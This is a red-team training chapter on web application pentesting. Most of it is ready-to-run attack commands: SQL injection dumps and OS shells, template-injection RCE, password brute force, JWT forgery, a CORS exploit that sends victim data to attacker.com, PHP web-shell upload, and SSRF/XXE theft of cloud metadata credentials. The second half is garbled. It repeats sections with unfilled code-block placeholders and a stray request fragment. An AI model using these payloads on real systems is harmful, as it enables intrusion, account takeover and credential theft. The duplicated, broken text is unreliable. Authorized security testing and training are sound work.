3. Web Application Pentesting

BLUF: Every red team engagement touches the web layer — login portals, APIs, admin panels, and exposed services. Blind spots in web fundamentals get you burned before you're even on the network. If you can't find and exploit OWASP Top 10 reliably and fast, you're not ready for real engagements.

Web Attack Progression

graph TB
    Start([HTTP Fundamentals]) --> Recon[Web Recon & Enumeration]
    Recon --> OWASP[OWASP Top 10]
    Recon --> Auth[Authentication Attacks]
    OWASP --> SQLi[SQLi & Injection]
    Auth --> API[API Hacking]
    SQLi --> Burp[Burp Suite Workflow]
    API --> Burp
    Burp --> Chains[File Upload & SSRF Chains]
    Chains --> FullWeb([Full Web Engagement])
    style Start fill:#ff6600
    style FullWeb fill:#00aa00

MITRE ATT&CK Mapping

Action Item 1 — HTTP Fundamentals & Web Recon [Beginner]

Systematic recon before touching a single input field. Map the attack surface first: endpoints, tech stack, JS secrets, and hidden functionality.

What you're building: A complete picture of the target's web surface — what tech runs it, how many doors it has, whether a WAF is watching, and what secrets the developers left lying in the open. Every subsequent action item depends on this map.

Technique: Web Surface Enumeration & Technology Fingerprinting

Operator Analogy: Think of web recon like surveilling a building before a physical breach:

Work through these phases in order. Don't touch inputs until you've finished Phase 1–3.

Phase 1 — Passive Recon & Asset Discovery

# Tech stack fingerprinting
curl -sI https://target.com | grep -iE "server|x-powered-by|x-aspnet|set-cookie"

# Certificate Transparency — subdomain discovery without scanning
curl -s "https://crt.sh/?q=%.target.com&output=json" | python3 -m json.tool | grep name_value | sort -u

# Wayback Machine — discover historical endpoints and parameters
curl -s "https://web.archive.org/cdx/search/cdx?url=*.target.com/*&output=text&fl=original&collapse=urlkey" | sort -u

# Google dorks — find exposed admin panels, login pages, configs
# site:target.com inurl:admin OR inurl:login OR inurl:dashboard
# site:target.com ext:env OR ext:log OR ext:bak
# "target.com" filetype:pdf (scope docs, org chart)

Why: Passive recon generates zero target-side traffic. Certificate Transparency logs every subdomain issued — faster and more complete than brute-force. Wayback Machine surfaces retired endpoints that are often still alive.

Phase 2 — Active Scanning & Fingerprinting

# Directory and endpoint brute-force
ffuf -u https://target.com/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt \
  -mc 200,301,302,403 -t 40 -o dirs.json

# Virtual host discovery
ffuf -u https://target.com -H "Host: FUZZ.target.com" \
  -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
  -mc 200,301,302 -fs 0

# JS endpoint harvesting — APIs hiding in frontend code
curl -s https://target.com/app.js | grep -oE '"(/[a-zA-Z0-9_/.-]+)"' | sort -u
# Or use linkfinder:
python3 linkfinder.py -i https://target.com -d -o results.html

# Nuclei — passive tech detection + known misconfigs
nuclei -u https://target.com -t technologies/ -silent
nuclei -u https://target.com -t misconfigurations/ -silent
nuclei -u https://target.com -t cves/ -severity critical,high -silent

# Parameter discovery on known endpoints
ffuf -u "https://target.com/api/v1/users?FUZZ=1" \
  -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt \
  -mc 200 -fs 0

Why: raft-medium wordlists surface ~80% of common endpoints in minutes. JS files often contain undocumented API routes and hardcoded tokens. Nuclei covers known misconfigs you'd otherwise miss manually.

Phase 3 — Authentication & Session Analysis

# Inspect login endpoint behavior — what headers and cookies does auth set?
curl -sI -X POST "https://target.com/login" \
  -d "username=admin&password=test" | grep -iE "set-cookie|location|x-frame|x-content"

# Decode JWT without a library
echo "eyJhbGci..." | cut -d. -f2 | base64 -d 2>/dev/null | python3 -m json.tool
# Check: alg field (RS256/HS256/none), exp, sub, role claims

# WAF fingerprinting
wafw00f https://target.com
# Manual probe: send a basic XSS/SQLi string and analyze the response
curl -s "https://target.com/?q=<script>alert(1)</script>" | grep -i "blocked\|firewall\|waf\|security"

Why: Auth cookies without HttpOnly/Secure/SameSite flags are trivially stolen via XSS. JWT alg: none or RS256→HS256 confusion is a critical finding. WAF behavior determines your injection approach — bypass strategies differ significantly by vendor.

OPSEC: Directory brute-force generates high request volume and will trigger rate limiting or WAF blocks. Use -rate in ffuf to throttle. Start with raft-small wordlists before going large. Always check for robots.txt and sitemap.xml first — free enumeration.

Action Item 2 — OWASP Top 10 Exploitation [Beginner]

Know the OWASP Top 10 cold. In a timed engagement, you need to identify and triage these categories in minutes, not hours.

What you're building: A triage checklist — quickly confirming or ruling out each OWASP class so you can invest time where the real vulnerabilities are. Speed matters; don't spend 45 minutes on A03 if A01 IDOR is sitting right there.

Technique: OWASP Vulnerability Class Identification & Exploitation

Tools: curl, Burp Suite, nuclei, nikto

Procedure:

# A01 - Broken Access Control (IDOR check)
# Access another user's resource by manipulating ID
curl -s "https://target.com/api/v1/users/2" -H "Authorization: Bearer YOUR_TOKEN"
curl -s "https://target.com/api/v1/orders/1001" -H "Authorization: Bearer USER_B_TOKEN"

# A03 - Injection (quick command injection probe)
curl -s "https://target.com/ping?host=127.0.0.1;id"
curl -s "https://target.com/search?q=test'--"   # SQLi probe

# A05 - Security Misconfiguration (exposed debug/admin)
ffuf -u https://target.com/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt \
  -mc 200 -t 30 | grep -iE "admin|debug|swagger|phpinfo|actuator|console"

# A06 - Vulnerable Components
nikto -h https://target.com -output nikto.txt
nuclei -u https://target.com -t cves/ -severity critical,high

# A07 - Auth Failures (default credentials)
curl -s -X POST "https://target.com/login" \
  -d "username=admin&password=admin" -L | grep -iE "welcome|dashboard|logout"

# A08 - Software Integrity (open redirect check)
curl -sI "https://target.com/redirect?url=https://evil.com" | grep -i location

# A09 - Security Logging (error verbosity check)
curl -s "https://target.com/api/v1/users/99999999" | python3 -m json.tool

# A02 - Cryptographic Failures (sensitive data in transit/storage)
# Check for HTTP → no forced HTTPS redirect:
curl -sI "http://target.com/" | grep -i location
# Check for sensitive data in response bodies (passwords, keys, PII):
curl -s "https://target.com/api/v1/profile" | grep -iE "password|ssn|dob|credit"

Why: Triage fast — IDOR (A01) and Injection (A03) are the highest-impact findings and quickest to confirm. Don't run nikto against every host; it's slow and noisy. Use nuclei CVE templates instead — faster, more targeted, less traffic.

Action Item 3 — Authentication Attacks [Beginner]

Authentication is the first gate. Username enumeration, brute force, JWT confusion, and OAuth flaws are consistent high-value findings across virtually every engagement.

What you're building: A bypass of the front door — whether via weak credentials, token forgery, or OAuth redirect abuse. This is often the quickest path to a foothold on web targets.

Technique: Authentication Bypass & Credential Attack

Tools: hydra, ffuf, jwt_tool, hashcat

Procedure:

# Username enumeration via timing or response difference
ffuf -u https://target.com/login -X POST \
  -d "username=FUZZ&password=invalid" \
  -w /usr/share/seclists/Usernames/top-usernames-shortlist.txt \
  -mr "Invalid password"   # Look for different response vs "User not found"

# Password brute-force (POST form)
hydra -l admin -P /usr/share/wordlists/rockyou.txt \
  target.com https-post-form "/login:username=^USER^&password=^PASS^:F=Invalid"

# JWT algorithm confusion (RS256 → HS256)
# 1. Decode JWT header+payload
python3 -c "import base64,json; print(json.dumps(json.loads(base64.b64decode('HEADER_B64==').decode())))"
# 2. Sign with public key as HMAC-SHA256 secret (jwt_tool)
python3 jwt_tool.py TOKEN -X a     # Algorithm confusion attack
python3 jwt_tool.py TOKEN -X n     # 'none' algorithm

# Crack JWT HS256 secret
hashcat -a 0 -m 16500 jwt.txt /usr/share/wordlists/rockyou.txt

# OAuth redirect_uri manipulation
# Test if redirect_uri is validated strictly
curl -s "https://target.com/oauth/authorize?client_id=APP&redirect_uri=https://evil.com&response_type=code"

# OAuth state parameter — CSRF check
# If no 'state' param in the authorization request → CSRF on the OAuth flow
curl -s "https://target.com/oauth/authorize?client_id=APP&redirect_uri=https://target.com/callback&response_type=code"
# → Look for missing or static 'state=' in the response redirect

# Password reset token entropy check
# Request 5 reset tokens and compare — look for sequential or predictable values
for i in 1 2 3 4 5; do
  curl -s -X POST "https://target.com/reset" -d "email=victim@target.com" -c cookies.txt
done

Why: Username enumeration is a pre-req for targeted brute-force — timing differences of even 50ms are exploitable. JWT alg:none and RS256→HS256 confusion are still found in production apps. OAuth missing state parameter is a textbook CSRF finding that often gets Critical severity.

OPSEC: Brute-force attacks will trigger account lockout and WAF rules. Use -t 1 in hydra and add jitter. Never brute-force production accounts without explicit scope approval.

Action Item 4 — API Hacking [Intermediate]

Modern applications expose more functionality through APIs than the UI. Undocumented endpoints, mass assignment, and GraphQL introspection are consistent goldmines.

What you're building: Access to backend functionality the UI was never meant to expose — admin endpoints, other users' data, privilege escalation via mass assignment, and secrets leaked through GraphQL introspection.

Technique: API Enumeration & Authorization Testing

Tools: Burp Suite, arjun, graphqlmap, curl

Procedure:

# API discovery — look for Swagger/OpenAPI specs
ffuf -u https://target.com/FUZZ -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt \
  -mc 200,401,403 -t 20
curl -s https://target.com/swagger.json | python3 -m json.tool
curl -s https://target.com/api/v1/openapi.yaml

# Parameter discovery on known endpoints
arjun -u "https://target.com/api/v1/users" --stable

# IDOR — access other users' objects
curl -s "https://target.com/api/v1/profile" -H "Authorization: Bearer USER_A_TOKEN"
# Change to another user's ID
curl -s "https://target.com/api/v1/profile/2" -H "Authorization: Bearer USER_A_TOKEN"

# Mass assignment — send extra fields not shown in UI
curl -s -X PUT "https://target.com/api/v1/users/1" \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer USER_TOKEN" \
  -d '{"username":"user","email":"user@test.com","role":"admin"}'

# GraphQL introspection
curl -s -X POST "https://target.com/graphql" \
  -H "Content-Type: application/json" \
  -d '{"query":"{__schema{types{name fields{name}}}}"}'

# GraphQL IDOR via ID field
curl -s -X POST "https://target.com/graphql" \
  -H "Content-Type: application/json" \
  -d '{"query":"{user(id:2){email password secrets}}"}'

# HTTP verb tampering — try methods not documented
curl -s -X DELETE "https://target.com/api/v1/users/1" -H "Authorization: Bearer USER_TOKEN"
curl -s -X PATCH "https://target.com/api/v1/users/1" -H "Authorization: Bearer USER_TOKEN" -d '{"role":"admin"}'

# BFLA (Broken Function Level Authorization) — regular user accessing admin functions
curl -s "https://target.com/api/v1/admin/users" -H "Authorization: Bearer USER_TOKEN"
curl -s "https://target.com/api/v2/admin/export" -H "Authorization: Bearer USER_TOKEN"

Why: REST APIs often have IDOR because the same developer who wrote the UI assumed the frontend would enforce access controls — it doesn't. GraphQL introspection enabled in production is a blueprint of the entire data model. Mass assignment via extra JSON fields is trivial to test and frequently missed.

Action Item 5 — SQL Injection & Injection Attacks [Intermediate]

Injection vulnerabilities remain endemic. Start manual, confirm with automation, then go deep. Blind SQLi and SSTI are often more impactful than error-based because they're missed by basic scanners.

What you're building: OS-level command execution, database extraction, or template engine RCE — from a single untrusted parameter. These are some of the highest-impact individual findings in web testing.

Technique: SQL Injection, SSTI, CORS Abuse, HTTP Smuggling, and Prototype Pollution

Tools: sqlmap, Burp Suite, curl, smuggler.py

Procedure:

# Manual SQLi detection — basic probes
curl -s "https://target.com/item?id=1'"          # Error-based probe
curl -s "https://target.com/item?id=1 AND 1=1"   # Boolean probe — should return same as id=1
curl -s "https://target.com/item?id=1 AND 1=2"   # Boolean probe — should return empty/different

# Union-based: determine column count
curl -s "https://target.com/item?id=1 ORDER BY 5--"   # Increase until error

# Union-based: extract data (3 columns, strings in col 2)
curl -s "https://target.com/item?id=-1 UNION SELECT NULL,username||':'||password,NULL FROM users--"

# Time-based blind (PostgreSQL)
curl -s "https://target.com/item?id=1;SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END--"

# sqlmap — confirm and extract
sqlmap -u "https://target.com/item?id=1" --batch --dbs
sqlmap -u "https://target.com/item?id=1" -D target_db --tables --batch
sqlmap -u "https://target.com/item?id=1" -D target_db -T users --dump --batch
sqlmap -u "https://target.com/item?id=1" --batch --os-shell   # OS shell if DBA privs

# WAF bypass tamper scripts
sqlmap -u "https://target.com/item?id=1" --tamper=space2comment,between --batch --dbs

# SSTI detection — probe with math expressions
curl -s "https://target.com/greet?name={{7*7}}"     # Jinja2/Twig: returns 49 if vulnerable
curl -s "https://target.com/greet?name=${7*7}"      # FreeMarker/Thymeleaf

# SSTI RCE (Jinja2)
curl -s "https://target.com/greet?name={{config.__class__.__init__.__globals__['os'].popen('id').read()}}"

OPSEC: sqlmap with default settings is extremely noisy and will hit every parameter repeatedly. Use --level=1 --risk=1 and -p to target specific parameters. In WAF environments, slow down with --delay=2.

CORS Misconfiguration

CORS bugs allow attacker-controlled pages to steal authenticated responses from the target API — effectively bypassing SOP.

# Step 1: Test Origin reflection — does the server echo back your Origin header?
curl -sI "https://target.com/api/v1/profile" \
  -H "Origin: https://evil.com" \
  -H "Authorization: Bearer TOKEN" | grep -i "access-control"
# Vulnerable if: Access-Control-Allow-Origin: https://evil.com
#                Access-Control-Allow-Credentials: true

# Step 2: Null origin abuse (via sandboxed iframe)
curl -sI "https://target.com/api/v1/profile" \
  -H "Origin: null" \
  -H "Authorization: Bearer TOKEN" | grep -i "access-control"
# Vulnerable if: Access-Control-Allow-Origin: null + Allow-Credentials: true

# Step 3: Wildcard with credentials — always misconfigured if both present
# Access-Control-Allow-Origin: * + Access-Control-Allow-Credentials: true → INVALID but some servers do it

PoC (Reflect-Origin exploit):

// Host on attacker.com, victim visits while authenticated
fetch("https://target.com/api/v1/profile", {
  credentials: "include"
})
.then(r => r.json())
.then(data => fetch("https://attacker.com/steal?data=" + btoa(JSON.stringify(data))));

Why: CORS reflection with Allow-Credentials: true allows full account takeover via one victim click. Null origin is exploitable via <iframe sandbox="allow-scripts" srcdoc="...">. Always check every authenticated API endpoint for CORS headers.

HTTP Request Smuggling

HTTP Request Smuggling exploits disagreements between front-end (proxy) and back-end (server) in how they parse Content-Length and Transfer-Encoding headers.

# TE.CL — front-end uses Transfer-Encoding, back-end uses Content-Length
# Manual detection: send ambiguous request and look for timeout or 400 response
curl -s -X POST "https://target.com/" \
  -H "Transfer-Encoding: chunked" \
  -H "Content-Length: 6" \
  --data 

> *Why:* Smuggling can poison backend queues to capture other users' requests (including their cookies and tokens), bypass access controls on internal endpoints, and chain with reflected XSS for full account takeover. Found frequently behind load balancers and CDNs.

#### Prototype Pollution

Prototype pollution corrupts `Object.prototype` in JavaScript, potentially enabling DOM XSS, property injection, or server-side RCE in Node.js.

```bash
# Client-side detection — browser console
# Inject __proto__ or constructor.prototype via URL query string:
# https://target.com/search?__proto__[test]=polluted
# Then in browser console:
# ({}).test   → "polluted" if vulnerable

# Server-side — query string
curl -s "https://target.com/api/search?__proto__[admin]=true" | python3 -m json.tool

# Server-side — JSON body
curl -s -X POST "https://target.com/api/users" \
  -H "Content-Type: application/json" \
  -d '{"__proto__":{"admin":true}}'

# Mass assignment chain: pollute + isAdmin check
curl -s -X POST "https://target.com/api/users/update" \
  -H "Content-Type: application/json" \
  -d '{"constructor":{"prototype":{"isAdmin":true}}}'

Why: Server-side prototype pollution in Node.js can achieve RCE if the app passes polluted properties to child_process.spawn() or similar sinks. Client-side pollution can bypass access checks rendered in the DOM. Use the "pp-finder" Burp extension for automated coverage.

Action Item 6 — Burp Suite Pro Workflow [Intermediate]

Burp is the central hub for web testing. A well-configured Burp instance with the right extensions multiplies your finding rate. Know it deeply.

What you're building: An intercepting proxy that is simultaneously your scanner, fuzzer, session manager, and collaboration hub — configured to maximize findings per hour.

Technique: Professional Web Testing Workflow

Tools: Burp Suite Pro, Param Miner, Autorize, Turbo Intruder

Procedure:

# --- Setup ---
# Proxy: FoxyProxy browser extension → 127.0.0.1:8080
# SSL: Import Burp CA cert (http://burp → CA Certificate)
# Scope: Target → Scope → Add target domain → check "Use advanced scope control"

# --- Param Miner (hidden parameter discovery) ---
# Right-click request → Extensions → Param Miner → Guess params
# Look for 200/302 responses that differ from baseline

# --- Autorize (access control testing across roles) ---
# Configure: paste low-privilege token in Autorize config
# Browse as admin — Autorize replays every request with the low-priv token
# Red = endpoint accessible by both → IDOR/BOLA finding

# --- Turbo Intruder (high-speed fuzzing + race conditions) ---
# Send request to Turbo Intruder → select race condition template
# Race condition example: two concurrent password reset requests
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint, concurrentConnections=10)
    for i in range(20):
        engine.queue(target.req)
    engine.openGate('race1')

# --- Intruder attack types ---
# Sniper: single parameter, one wordlist
# Battering Ram: same payload in all positions
# Pitchfork: parallel wordlists (username:password pairs)
# Cluster Bomb: all combinations (credential stuffing)

# --- Active Scanner config (Pro only) ---
# Scanner → Audit items → Uncheck "Out of scope" and "Misc" for faster runs
# Set insertion points: Headers, Cookie values, Body params
# Always run passive scan first, then active on confirmed attack surface only

# --- Key extensions (BApp Store) ---
# Logger++          — persistent request log with filtering
# JS Miner          — extract endpoints and secrets from JS files
# HTTP Request Smuggler — automated smuggling detection
# CSRF Scanner      — detect missing CSRF tokens
# JWT Editor        — manipulate and forge JWTs inline

Why: Autorize catches IDOR/BOLA automatically as you browse — findings that manual testing misses. Turbo Intruder's race condition template finds time-of-check/time-of-use (TOCTOU) bugs that single-threaded Intruder cannot reproduce. Logger++ ensures you never lose a request during a long engagement.

Action Item 7 — File Upload & SSRF Chains [Advanced]

File upload and SSRF are frequently chainable — a file upload to RCE, or SSRF to cloud metadata credential theft. Both are high-severity on their own; chained they can mean full cloud account takeover.

What you're building: Remote code execution via a file that shouldn't execute, or credential theft via a request the server shouldn't be making on your behalf.

Technique: File Upload Bypass, Web Shell Deployment, and SSRF Exploitation

Tools: Burp Suite, curl, weevely, exiftool

Procedure:

# --- File upload bypass ---

# MIME type spoofing (change Content-Type to image/jpeg for PHP shell)
curl -s -X POST "https://target.com/upload" \
  -F "file=@shell.php;type=image/jpeg" -b "session=COOKIE"

# Double extension bypass
mv shell.php shell.php.jpg
# If server strips last extension: shell.php.jpg → still parsed as PHP

# Null byte injection (older PHP)
# shell.php%00.jpg

# Polyglot — valid image + PHP in EXIF
exiftool -Comment='<?php system($_GET["cmd"]); ?>' legit.jpg
mv legit.jpg shell.php.jpg

# Deploy and access web shell
curl -s "https://target.com/uploads/shell.php?cmd=id"
curl -s "https://target.com/uploads/shell.php?cmd=cat+/etc/passwd"

# --- SSRF exploitation ---

# Internal service discovery via SSRF
curl -s "https://target.com/fetch?url=http://127.0.0.1:80/"
curl -s "https://target.com/fetch?url=http://169.254.169.254/latest/meta-data/"  # AWS IMDS

# AWS IMDS via SSRF — steal IAM credentials
curl -s "https://target.com/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/"
# → returns role name, then:
curl -s "https://target.com/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_NAME"

# Azure IMDS via SSRF
curl -s "https://target.com/fetch?url=http://169.254.169.254/metadata/identity/oauth2/token?api-version=2023-07-01&resource=https://management.azure.com/" \
  -H "Metadata: true"

# SSRF bypass techniques — filter evasion
# Decimal IP:       http://2130706433/         (= 127.0.0.1)
# Octal IP:         http://0177.0.0.1/
# IPv6 loopback:    http://[::1]/
# URL encoding:     http://127.0.0.1%2F
# DNS rebinding:    http://attacker-controlled-domain.com/ → resolves to 127.0.0.1

# XXE to SSRF (XML endpoint)
curl -s -X POST "https://target.com/api/xml" \
  -H "Content-Type: application/xml" \
  -d '<?xml version="1.0"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">]><root>&xxe;</root>'

# Out-of-band XXE (blind — use Burp Collaborator or interactsh)
curl -s -X POST "https://target.com/api/xml" \
  -H "Content-Type: application/xml" \
  -d '<?xml version="1.0"?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "http://INTERACTSH_SERVER/test"> %xxe;]><root/>'

OPSEC: Web shells on target servers are high-risk artifacts. Use memory-only shells where possible, or clean up immediately after use. SSRF to IMDS is often allowed and unmonitored, but the subsequent API calls using stolen credentials will generate CloudTrail events.

Action Item 8 — Full Web Engagement [Operator]

A real web application pentest is a structured, time-boxed operation: map → exploit → chain → document. The goal is not to find every bug — it's to find the highest-impact chain.

Technique: End-to-End Web Attack Chain

Tools: Full web testing stack

Procedure:

# Phase 1: Recon (30 min)
# Map all endpoints, identify tech stack, enumerate subdomains, harvest JS endpoints
ffuf -u https://target.com/FUZZ -w raft-medium-directories.txt -mc 200,301,302,403 -o recon.json
nuclei -u https://target.com -t technologies/ -t misconfigurations/ -silent
curl -s "https://crt.sh/?q=%.target.com&output=json" | python3 -m json.tool | grep name_value | sort -u

# Phase 2: Authentication surface (20 min)
# Identify login endpoints, API auth, JWT usage, OAuth flows
curl -sI https://target.com/api/v1/users | grep -i auth
# Capture a valid token, decode JWT if present
echo "JWT_HERE" | cut -d. -f2 | base64 -d 2>/dev/null | python3 -m json.tool
# Check: algorithm, expiry, role claims, audience

# Phase 3: Targeted exploitation (60 min)
# Prioritize: IDOR > SQLi > Auth bypass > SSRF > Stored XSS
# IDOR quick check — change user ID in API calls
# SQLi — probe every parameter that hits the DB
# Upload endpoint — attempt file type bypass

# Phase 4: Chain for maximum impact
# Example chain: File upload bypass → PHP shell → RCE → SSRF to IMDS → AWS creds
curl -s "https://target.com/uploads/shell.php?cmd=curl+http://169.254.169.254/latest/meta-data/iam/security-credentials/app-role"

# Example chain: CORS + XSS → steal auth token → account takeover
# 1. Find stored XSS in user-controlled field
# 2. Inject fetch() to /api/v1/profile (CORS reflected) with credentials:include
# 3. Exfiltrate token to attacker-controlled server

# Phase 5: Document findings (structured)
# Each finding needs: title, CWE, CVSS, steps to reproduce, evidence (screenshot/response), remediation
# CVSS calculator: https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator
# Example: IDOR on /api/v1/users/{id} — CVSS 7.5 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)

OPSEC: In grey/black-box engagements, assume WAFs are present and rate limiting is active. Slow down automated tools and prioritize manual validation of high-impact chains over volume of findings. A single RCE or critical IDOR is worth more than 20 informational findings.

Resources & Certifications

Part of the Red Teaming 101 series.
3\r\nabc\r\n0\r\n\r\n'

Automated detection with smuggler.py

python3 smuggler.py -u https://target.com/ -t 10

Confirm with Burp Suite → Repeater → HTTP/1 → send raw request

Use "HTTP Request Smuggler" Burp extension for automated fuzzing

> *Why:* Smuggling can poison backend queues to capture other users' requests (including their cookies and tokens), bypass access controls on internal endpoints, and chain with reflected XSS for full account takeover. Found frequently behind load balancers and CDNs.

#### Prototype Pollution

Prototype pollution corrupts `Object.prototype` in JavaScript, potentially enabling DOM XSS, property injection, or server-side RCE in Node.js.

{{CODE_BLOCK_11}}

> *Why:* Server-side prototype pollution in Node.js can achieve RCE if the app passes polluted properties to `child_process.spawn()` or similar sinks. Client-side pollution can bypass access checks rendered in the DOM. Use the "pp-finder" Burp extension for automated coverage.

---

### Action Item 6 — Burp Suite Pro Workflow `[Intermediate]`
Burp is the central hub for web testing. A well-configured Burp instance with the right extensions multiplies your finding rate. Know it deeply.

> *What you're building:* An intercepting proxy that is simultaneously your scanner, fuzzer, session manager, and collaboration hub — configured to maximize findings per hour.

**Technique:** Professional Web Testing Workflow

**Tools:** Burp Suite Pro, Param Miner, Autorize, Turbo Intruder

**Procedure:**
{{CODE_BLOCK_12}}

> *Why:* Autorize catches IDOR/BOLA automatically as you browse — findings that manual testing misses. Turbo Intruder's race condition template finds time-of-check/time-of-use (TOCTOU) bugs that single-threaded Intruder cannot reproduce. Logger++ ensures you never lose a request during a long engagement.

---

### Action Item 7 — File Upload & SSRF Chains `[Advanced]`
File upload and SSRF are frequently chainable — a file upload to RCE, or SSRF to cloud metadata credential theft. Both are high-severity on their own; chained they can mean full cloud account takeover.

> *What you're building:* Remote code execution via a file that shouldn't execute, or credential theft via a request the server shouldn't be making on your behalf.

**Technique:** File Upload Bypass, Web Shell Deployment, and SSRF Exploitation

**Tools:** Burp Suite, curl, weevely, exiftool

**Procedure:**
{{CODE_BLOCK_13}}

> **OPSEC:** Web shells on target servers are high-risk artifacts. Use memory-only shells where possible, or clean up immediately after use. SSRF to IMDS is often allowed and unmonitored, but the subsequent API calls using stolen credentials will generate CloudTrail events.

---

### Action Item 8 — Full Web Engagement `[Operator]`
A real web application pentest is a structured, time-boxed operation: map → exploit → chain → document. The goal is not to find every bug — it's to find the highest-impact chain.

**Technique:** End-to-End Web Attack Chain

**Tools:** Full web testing stack

**Procedure:**
{{CODE_BLOCK_14}}

| Priority | Finding Type | Why |
|---|---|---|
| 1st | IDOR / BOLA | Immediate user data exposure, fast to confirm |
| 2nd | SQLi | Often leads to full DB dump or OS shell |
| 3rd | Auth bypass | Account takeover without a valid credential |
| 4th | SSRF | Cloud cred theft if IMDS reachable |
| 5th | Stored XSS | High impact when targeting admin panels |

> **OPSEC:** In grey/black-box engagements, assume WAFs are present and rate limiting is active. Slow down automated tools and prioritize manual validation of high-impact chains over volume of findings. A single RCE or critical IDOR is worth more than 20 informational findings.

---

## Resources & Certifications

| Resource | Type | Pillar Relevance |
|---|---|---|
| [PortSwigger Web Security Academy](https://portswigger.net/web-security) | Labs | All items |
| [DVWA](https://github.com/digininja/DVWA) | Lab | Items 2, 5 |
| [vAPI](https://github.com/roottusk/vapi) | Lab | Item 4 |
| [crAPI](https://github.com/OWASP/crAPI) | Lab | Item 4 |
| [HackTricks Web](https://book.hacktricks.xyz/) | Reference | All items |
| [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings) | Reference | All items |
| [SecLists](https://github.com/danielmiessler/SecLists) | Wordlists | Items 1, 3, 6 |
| [Burp Suite Pro](https://portswigger.net/burp/pro) | Tool | Item 6 |
| [sqlmap](https://sqlmap.org/) | Tool | Item 5 |
| [jwt_tool](https://github.com/ticarpi/jwt_tool) | Tool | Item 3 |
| [Nuclei](https://github.com/projectdiscovery/nuclei) | Tool | Items 1, 2 |
| [smuggler.py](https://github.com/defparam/smuggler) | Tool | Item 5 |
| [wafw00f](https://github.com/EnableSecurity/wafw00f) | Tool | Item 1 |
| BBPH (eLearnSecurity) | Certification | Items 1-4 |
| OSWE (OffSec) | Certification | Items 5-8 |

---
*Part of the Red Teaming 101 series.*